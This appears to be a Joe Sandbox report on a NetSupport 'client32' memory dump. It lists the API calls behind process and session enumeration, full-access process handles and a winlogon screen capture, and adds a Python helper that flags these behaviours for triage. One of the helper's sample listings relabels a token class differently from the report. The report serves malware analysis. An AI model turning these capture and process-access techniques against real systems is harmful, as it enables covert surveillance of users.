                                                                                • GetWindowRect.USER32(?,?), ref: 11015887
                                                                                • _memset.LIBCMT ref: 11015895
                                                                                • CreateFontIndirectA.GDI32(?), ref: 110158B1
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 110158C5
                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 110158D0
                                                                                • BeginPath.GDI32(00000000), ref: 110158DD
                                                                                • TextOutA.GDI32(00000000,00000000,00000000), ref: 11015900
                                                                                • EndPath.GDI32(00000000), ref: 11015907
                                                                                • PathToRegion.GDI32(00000000), ref: 1101590E
                                                                                • CreateSolidBrush.GDI32(?), ref: 11015920
                                                                                • CreateSolidBrush.GDI32(?), ref: 11015936
                                                                                • CreatePen.GDI32(00000000,00000002,?), ref: 11015950
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 1101595E
                                                                                • SelectObject.GDI32(00000000,?), ref: 1101596E
                                                                                • GetRgnBox.GDI32(00000000,?), ref: 1101597B
                                                                                • OffsetRgn.GDI32(00000000,?,00000000), ref: 1101599A
                                                                                • FillRgn.GDI32(00000000,00000000,?), ref: 110159A9
                                                                                • FrameRgn.GDI32(00000000,00000000,?,00000002,00000002), ref: 110159BC
                                                                                • DeleteObject.GDI32(00000000), ref: 110159C9
                                                                                • SelectObject.GDI32(00000000,?), ref: 110159D3
                                                                                • SelectObject.GDI32(00000000,?), ref: 110159DD
                                                                                • DeleteObject.GDI32(?), ref: 110159E6
                                                                                • DeleteObject.GDI32(?), ref: 110159EF
                                                                                • DeleteObject.GDI32(?), ref: 110159F8
                                                                                • SelectObject.GDI32(00000000,?), ref: 11015A02
                                                                                • DeleteObject.GDI32(?), ref: 11015A0B
                                                                                • SetBkMode.GDI32(00000000,?), ref: 11015A15
                                                                                • EndPaint.USER32(?,?), ref: 11015A29
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Object$Select$Delete$Create$Path$BeginBrushModePaintSolid$FillFontFrameIndirectOffsetRectRegionTextWindow_memset
                                                                                • String ID:
                                                                                • API String ID: 3702029449-0
                                                                                • Opcode ID: e7ca80d8907cc304a46d9070d682bdfbe178c52b0f9b8c57fa8b4971fc68b104
                                                                                • Instruction ID: e7a7d0d35206815f70b1bb972d69f7a8e5722a3a2875c7dff22017cd80ac6707
• Opcode Fuzzy Hash: e7ca80d8907cc304a46d9070d682bdfbe178c52b0f9b8c57fa8b4971fc68b104
• Instruction Fuzzy Hash: 6F51FA75A41228AFDB14DBA4CD88FAEB7B9FF89304F004199E51997244DB74AE40CF61
APIs
• GetSysColor.USER32(00000004), ref: 1100385F
• InflateRect.USER32(?,000000FF,000000FF), ref: 1100387A
• GetSysColor.USER32(00000010), ref: 1100388D
• GetSysColor.USER32(00000010), ref: 110038A4
• GetSysColor.USER32(00000014), ref: 110038BB
• GetSysColor.USER32(00000014), ref: 110038D2
• GetSysColor.USER32(00000014), ref: 110038F5
• GetSysColor.USER32(00000014), ref: 1100390C
• GetSysColor.USER32(00000010), ref: 11003923
• GetSysColor.USER32(00000010), ref: 1100393A
• GetSysColor.USER32(00000004), ref: 11003951
• SetBkColor.GDI32(00000000,00000000), ref: 11003958
• InflateRect.USER32(?,000000FE,000000FD), ref: 11003966
• GetSysColor.USER32(00000010), ref: 11003982
• CreatePen.GDI32(?,00000001,00000000), ref: 1100398B
• SelectObject.GDI32(00000000,00000000), ref: 11003999
• MoveToEx.GDI32(00000000,?,?,00000000), ref: 110039B2
• LineTo.GDI32(00000000,?,?), ref: 110039C6
• SelectObject.GDI32(00000000,?), ref: 110039D4
• DeleteObject.GDI32(?), ref: 110039DE
• GetSysColor.USER32(00000014), ref: 110039EC
• CreatePen.GDI32(?,00000001,00000000), ref: 110039F5
• SelectObject.GDI32(00000000,00000000), ref: 11003A02
• MoveToEx.GDI32(00000000,?,?,00000000), ref: 11003A1E
• LineTo.GDI32(00000000,?,?), ref: 11003A35
• SelectObject.GDI32(00000000,?), ref: 11003A43
• DeleteObject.GDI32(00000000), ref: 11003A4A
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Color$Object$Select$CreateDeleteInflateLineMoveRect
• String ID:
• API String ID: 1903512896-0
• Opcode ID: 2cfe13d901323041af8979d0bf4f233a4973ef12df7ab060298465a19fe5eca5
• Instruction ID: aabe104b4c11b9f3e9ba86a19e2760383e051eecf234c5ca32d00541c09823f7
• Opcode Fuzzy Hash: 2cfe13d901323041af8979d0bf4f233a4973ef12df7ab060298465a19fe5eca5
• Instruction Fuzzy Hash: D18170B5900209AFEB14DFA4CC85EBFB7B9FF88704F104658F611A7681D770A941CBA0
APIs
• LoadLibraryA.KERNEL32(psapi.dll,1B702977,00000002,11030250,?,00000000,1118A896,000000FF,?,1110809F,00000000,?,11030250,00000000,00000000), ref: 1110708D
  • Part of subcall function 11138260: GetVersion.KERNEL32(00000000,75730BD0,00000000), ref: 11138283
  • Part of subcall function 11138260: GetModuleHandleA.KERNEL32(ntdll.dll), ref: 111382A4
  • Part of subcall function 11138260: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 111382B4
  • Part of subcall function 11138260: GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 111382D1
  • Part of subcall function 11138260: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 111382DD
  • Part of subcall function 11138260: _memset.LIBCMT ref: 111382F7
• FreeLibrary.KERNEL32(00000000,?,1110809F,00000000,?,11030250,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF), ref: 111070DF
• LoadLibraryA.KERNEL32(Kernel32.dll,?,1110809F,00000000,?,11030250,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF), ref: 11107116
• GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 111071A0
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 111071F1
• GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 1110726A
• SetLastError.KERNEL32(00000078,?,1110809F), ref: 1110728C
• SetLastError.KERNEL32(00000078,?,1110809F), ref: 111072A3
• SetLastError.KERNEL32(00000078,?,1110809F), ref: 111072B0
• OpenProcess.KERNEL32(001F0FFF(PROCESS_ALL_ACCESS),00000000,?,?,1110809F), ref: 111072D0
  • Part of subcall function 110262F0: GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11026306
  • Part of subcall function 110262F0: K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
  • Part of subcall function 110262F0: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11026336
• CloseHandle.KERNEL32(00000000,00000000,?,00000104,?,1110809F), ref: 11107446
  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
• OpenProcessToken.ADVAPI32(00000000,00000008(TOKEN_QUERY),?,?,00000000,?,00000104,?,1110809F), ref: 11107360
• GetTokenInformation.ADVAPI32(?,0000000C(TokenSessionId),?,00000004,?,?,00000000,?,00000104,?,1110809F), ref: 1110738F
• CloseHandle.KERNEL32(?,?,00000000,?,00000104,?,1110809F), ref: 1110743F
• FreeLibrary.KERNEL32(?,?,?,?,?,1110809F), ref: 111074CC
• FreeLibrary.KERNEL32(00000000,?,?,?,?,1110809F), ref: 111074D3
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: AddressProc$Library$Handle$ErrorFreeLastProcess$CloseLoadModuleOpenToken$FileImageInformationNameVersion_memset_strrchr
• String ID: EnumProcesses$Kernel32.dll$ProcessIdToSessionId$WTSGetActiveConsoleSessionId$dwm.exe$psapi.dll$winlogon.exe
• API String ID: 348974188-2591373181
• Opcode ID: 044dce669899cd37b7012f5320303afde3b4de6bbd5268eb7c3f06993fea3566
• Instruction ID: c6fb8941b728de1d874c8cf5bae9c94d2d097e9c1a5b8d4b24900e8511d45065
• Opcode Fuzzy Hash: 044dce669899cd37b7012f5320303afde3b4de6bbd5268eb7c3f06993fea3566
• Instruction Fuzzy Hash: A2C17DB1D0066A9FDB22DF658D846ADFAB8BB09314F4141FAE65CE7280D7309B84CF51
APIs
• GetObjectA.GDI32(?,00000018,?), ref: 110EF8FE
• GetStockObject.GDI32(0000000F), ref: 110EF912
• GetDC.USER32(00000000), ref: 110EF98A
• SelectPalette.GDI32(00000000,00000000,00000000), ref: 110EF99B
• RealizePalette.GDI32(00000000), ref: 110EF9A1
• GlobalAlloc.KERNEL32(00000042,?,00000000), ref: 110EF9BC
• SelectPalette.GDI32(00000000,?,00000001), ref: 110EF9D0
• RealizePalette.GDI32(00000000), ref: 110EF9D3
• ReleaseDC.USER32(00000000,00000000), ref: 110EF9DB
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Palette$ObjectRealizeSelect$AllocGlobalReleaseStock
• String ID:
• API String ID: 1969595663-0
• Opcode ID: bce5d3ccbce10ed5eefc93319fcdcff04fec20c36a24ddf07fe8ce088f884d40
• Instruction ID: e17b5be7c9f279923d338761c599270f53c35d08167a1dd70bb196578b399fb7
• Opcode Fuzzy Hash: bce5d3ccbce10ed5eefc93319fcdcff04fec20c36a24ddf07fe8ce088f884d40
• Instruction Fuzzy Hash: 3471B2B2E41228AFDB04CFE5CC88BEEB7B9FF48705F044129F515E7244D674A9408BA1
APIs
• OpenFileMappingA.KERNEL32(000F001F(FILE_MAP_ALL_ACCESS),00000000,-00000007), ref: 1105D277
• MapViewOfFile.KERNEL32(00000000,00000002(FILE_MAP_WRITE),00000000,00000000,00000000), ref: 1105D294
• GetDC.USER32(00000000), ref: 1105D2BB
• CreateCompatibleDC.GDI32(00000000), ref: 1105D2CF
• CreateDIBSection.GDI32(00000000,00000004,00000000,?,?,?), ref: 1105D2F2
• SelectObject.GDI32(00000000,00000000), ref: 1105D300
• GetTickCount.KERNEL32 ref: 1105D30F
• BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020(SRCCOPY)), ref: 1105D333
• GetTickCount.KERNEL32 ref: 1105D33C
• GetLastError.KERNEL32(?), ref: 1105D348
• GdiFlush.GDI32 ref: 1105D35C
• SelectObject.GDI32(00000000,?), ref: 1105D367
• DeleteObject.GDI32(00000000), ref: 1105D36E
• DeleteDC.GDI32(00000000), ref: 1105D378
• ReleaseDC.USER32(00000000,00000000), ref: 1105D384
• UnmapViewOfFile.KERNEL32(00000000), ref: 1105D38E
• CloseHandle.KERNEL32(00000000), ref: 1105D396
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: FileObject$CountCreateDeleteSelectTickView$CloseCompatibleErrorFlushHandleLastMappingOpenReleaseSectionUnmap
• String ID: /thumb:$Error %d blitting from winlogon, took %d ms$ThumbWL
• API String ID: 652520247-4094952007
• Opcode ID: 8f5b295e94eaa7f285b731955c0fd9ff915ca6e09ee39c0381679d34cd356cea
• Instruction ID: 78b6d8997dae8530c3cf648a665dcf4201cc58d59c57f0d4bee68b800920de56
• Opcode Fuzzy Hash: 8f5b295e94eaa7f285b731955c0fd9ff915ca6e09ee39c0381679d34cd356cea
• Instruction Fuzzy Hash: 924190B9E41229AFD704CFA4DD89FAEBBB8FB48704F104165F920A7644D730A901CBA1
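The two routines above, the session and process enumeration at 1110708D..111074D3 (LoadLibraryA/GetProcAddress resolving WTSGetActiveConsoleSessionId, EnumProcesses and ProcessIdToSessionId, then OpenProcess with 001F0FFF, OpenProcessToken and GetTokenInformation, with winlogon.exe and dwm.exe among the strings) and the winlogon thumbnail blit at 1105D277..1105D396 (OpenFileMappingA, MapViewOfFile, CreateDIBSection, BitBlt, with the strings ThumbWL and "Error %d blitting from winlogon"), are easier to reason about as API sequences than as raw bullets. The following is an added Python helper, not part of the Joe Sandbox report or of the NetSupport client, that parses the report's "• Api.MODULE(args), ref: ADDR" bullets and applies a few triage rules to each function. The sample listings are copied from the two functions' bullets as the sandbox printed them; the rule names and the choice of rules are the editor's. It decodes the GetTokenInformation class value itself rather than trusting a tool label: 0xC is TokenSessionId in TOKEN_INFORMATION_CLASS (TokenIntegrityLevel is 0x19), which is what fits the session lookups around it.

```python
"""Triage helper for Joe Sandbox per-function API listings (added example).

Parses the "• Api.MODULE(arg,...), ref: ADDR" bullets printed under each
function's "APIs" heading and flags API combinations worth a closer look.
"""
import re
from dataclasses import dataclass
from typing import Optional

API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?\s*,?\s*(?:ref:\s*(?P<ref>[0-9A-Fa-f]+))?\s*$"
)
# A sandbox hex word, optionally followed by the tool's own label, e.g. 0000000C(TokenIntegrityLevel)
HEX_WORD = re.compile(r"^-?([0-9A-Fa-f]{1,8})(?:\(.*\))?$")

PROCESS_ALL_ACCESS = 0x1F0FFF
# TOKEN_INFORMATION_CLASS (winnt.h): 12 is TokenSessionId, 25 is TokenIntegrityLevel.
TOKEN_CLASS_NAMES = {0x0C: "TokenSessionId", 0x19: "TokenIntegrityLevel"}

# Sample input copied from the report's bullets for the session-enumeration routine.
SESSION_LISTING = """APIs
• LoadLibraryA.KERNEL32(psapi.dll,1B702977,00000002,11030250,?,00000000,1118A896,000000FF,?,1110809F,00000000,?,11030250,00000000,00000000), ref: 1110708D
  • Part of subcall function 11138260: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 111382B4
  • Part of subcall function 11138260: _memset.LIBCMT ref: 111382F7
• LoadLibraryA.KERNEL32(Kernel32.dll,?,1110809F,00000000,?,11030250,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF), ref: 11107116
• GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 111071A0
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 111071F1
• GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 1110726A
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,1110809F), ref: 111072D0
• OpenProcessToken.ADVAPI32(00000000,00000008,?,?,00000000,?,00000104,?,1110809F), ref: 11107360
• GetTokenInformation.ADVAPI32(?,0000000C(TokenIntegrityLevel),?,00000004,?,?,00000000,?,00000104,?,1110809F), ref: 1110738F
• CloseHandle.KERNEL32(?,?,00000000,?,00000104,?,1110809F), ref: 1110743F
• FreeLibrary.KERNEL32(00000000,?,?,?,?,1110809F), ref: 111074D3
Strings
"""

# Sample input copied from the report's bullets for the winlogon thumbnail routine.
THUMB_LISTING = """APIs
• OpenFileMappingA.KERNEL32(000F001F,00000000,-00000007), ref: 1105D277
• MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 1105D294
• GetDC.USER32(00000000), ref: 1105D2BB
• CreateCompatibleDC.GDI32(00000000), ref: 1105D2CF
• CreateDIBSection.GDI32(00000000,00000004,00000000,?,?,?), ref: 1105D2F2
• SelectObject.GDI32(00000000,00000000), ref: 1105D300
• GetTickCount.KERNEL32 ref: 1105D30F
• BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 1105D333
• UnmapViewOfFile.KERNEL32(00000000), ref: 1105D38E
• CloseHandle.KERNEL32(00000000), ref: 1105D396
"""


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: Optional[str]
    subcall: Optional[str]  # callee address when the bullet is "Part of subcall function"


def parse_api_lines(text: str) -> list:
    """Return one ApiCall per bullet; headings and non-API lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module").upper(), args,
                             m.group("ref"), m.group("sub")))
    return calls


def hex_arg(arg: str) -> Optional[int]:
    """Decode a sandbox hex argument word; '?' and string literals give None."""
    m = HEX_WORD.match(arg)
    return int(m.group(1), 16) if m else None


def triage(calls: list) -> dict:
    """Apply behavioural rules to the direct calls of one function (subcalls are excluded)."""
    direct = [c for c in calls if c.subcall is None]
    names = {c.api for c in direct}
    findings = {}

    # Imports resolved at run time: GetProcAddress(hModule, "Name") with a literal name.
    resolved = sorted({c.args[1] for c in direct
                       if c.api == "GetProcAddress" and len(c.args) > 1
                       and c.args[1] != "?" and hex_arg(c.args[1]) is None})
    if resolved:
        findings["dynamic_imports"] = resolved

    # Full-access handle to another process.
    if any(c.api == "OpenProcess" and c.args and hex_arg(c.args[0]) == PROCESS_ALL_ACCESS
           for c in direct):
        findings["open_process_all_access"] = True

    # Which token field is read? Decode the numeric class instead of trusting the label.
    for c in direct:
        if c.api == "GetTokenInformation" and len(c.args) > 1:
            cls = hex_arg(c.args[1])
            findings["token_info_class"] = TOKEN_CLASS_NAMES.get(
                cls, hex(cls) if cls is not None else "?")

    # Locating processes by session: console-session lookup or per-process session queries.
    if ({"WTSGetActiveConsoleSessionId", "ProcessIdToSessionId"} & set(resolved)
            or findings.get("token_info_class") == "TokenSessionId"):
        findings["session_discovery"] = True

    # Screen capture handed over through a named shared-memory section.
    if {"OpenFileMappingA", "MapViewOfFile", "BitBlt"} <= names:
        findings["shared_memory_screen_capture"] = True

    return findings


if __name__ == "__main__":
    for label, listing in (("session", SESSION_LISTING), ("thumb", THUMB_LISTING)):
        print(label, triage(parse_api_lines(listing)))
```

Feed it a whole report by concatenating each function's "APIs" section; functions whose findings include both session_discovery and open_process_all_access are the ones to open first in the disassembly, since they pick a target process in the interactive session and obtain a full-access handle to it.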
APIs
  • Part of subcall function 110ED520: RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C
  • Part of subcall function 110CFE80: _malloc.LIBCMT ref: 110CFE9A
  • Part of subcall function 110ED180: RegEnumKeyExA.ADVAPI32(?,?,?,00000200,00000000,00000000,00000000,00000000,?,00000000), ref: 110ED1CB
• wsprintfA.USER32 ref: 1102B84D
  • Part of subcall function 110ED8F0: RegQueryInfoKeyA.ADVAPI32(0002001F,?,?,0002001F,?,?,0002001F,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,1102B625), ref: 110ED926
• FileTimeToSystemTime.KERNEL32(0002001F,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 1102B65A
• wsprintfA.USER32 ref: 1102B69E
• wsprintfA.USER32 ref: 1102B705
  • Part of subcall function 110EDF70: wsprintfA.USER32 ref: 110EDFD4
  • Part of subcall function 110EDF70: _malloc.LIBCMT ref: 110EE053
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: wsprintf$Time_malloc$EnumFileInfoOpenQuerySystem
• String ID: %02d/%02d/%02d %02d:%02d:%02d.%03d$%s\%s$Accel=restored$Acceleration$DirectSound$DirectSound\Device Presence$DirectSound\Mixer Defaults$Error. Can't open %s$IsA()$Software\NSL\Saved\DS$WDM$Warning. DSReg e=%d, e2=%d$accel=%d, wdm=%d, key=%s, mix=%s, dev=%s$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$set %s=15, e=%d
• API String ID: 2153351953-120756110
• Opcode ID: 55af8f51facff4bcc049042925dfacc4f9a74063fc1775215d98820dbec6b2aa
• Instruction ID: 3d8c04e41a601bc5ed25e478ecb801087f545ab88011abf8f54d42b1378c6c4c
• Opcode Fuzzy Hash: 55af8f51facff4bcc049042925dfacc4f9a74063fc1775215d98820dbec6b2aa
• Instruction Fuzzy Hash: CEB17075D0122AAFDB24DB55CD98FEDB7B8EF05308F4041D9E91962280EB346E88CF61
                                                                                APIs
                                                                                • wsprintfA.USER32 ref: 1105F890
                                                                                • wsprintfA.USER32 ref: 1105F8A4
                                                                                • wsprintfA.USER32 ref: 1105F8FF
                                                                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,?,00000000,?,80000002,?,00020019), ref: 1105F97F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
